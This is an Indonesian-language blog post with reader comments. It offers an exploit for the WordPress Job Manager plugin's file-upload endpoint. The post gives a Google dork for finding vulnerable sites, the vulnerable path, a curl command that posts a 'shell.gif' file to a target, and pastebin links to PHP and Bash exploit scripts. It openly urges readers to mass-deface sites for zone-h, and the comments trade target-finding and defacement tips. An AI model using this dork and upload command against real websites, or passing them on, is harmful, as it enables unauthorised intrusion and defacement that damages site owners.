Tuesday, 6 June 2017

WordPress Plugin Job Manager File Upload

Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

18 comments:

  1. nyari targetnya gimana bang ???

    ReplyDelete
    Replies
    1. inurl:/wp-content/uploads/job-manager-uploads

      Delete
    2. ke google terus ketik inurl:/wp-content/uploads/job-manager-uploads

      Delete
  2. ada tutor deface buat yg blm ngerti apa2 gak om?

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. bro what tool name used in windows to run php files

    ReplyDelete
    Replies
    1. xampp bro

      see tuts: http://www.indoxploit.or.id/2016/07/cara-menjalankan-exploiter-php.html

      Delete
  5. bro,kalo password hash nya pula gmana mau dapatkan?

    ReplyDelete
  6. {"success":false,"data":[{"code":"upload","message":"You must be logged in to upload files using this method."}]}

    ReplyDelete
  7. tOLONG diperjelas lagi step by step urutan yang harus dilakukan. terimakasih.

    ReplyDelete
  8. Saya upload file pakai script php yang ada di bagian step pertma di tutorial ini dan sudah berhasil sampai step muncul {"files":[]}, kemudian langkah apalagi yang harus saya lakukan.
    Terimakash

    ReplyDelete
    Replies
    1. pake toolsnya aja gan, cuma tinggal masukin url doang sama ganti gambarnya

      Delete
  9. Mas mau nanya, ini bisa di exploit sampe upload shell ga sih ? maaf saya masih newbie banget makanya kurang tau banyak, makasih

    ReplyDelete
    Replies
    1. gabisa gan cuma sekedar upload gambar aja

      Delete
  10. thanks selalu om agus,,, maap baru jalan2 di mari lagi :D

    ReplyDelete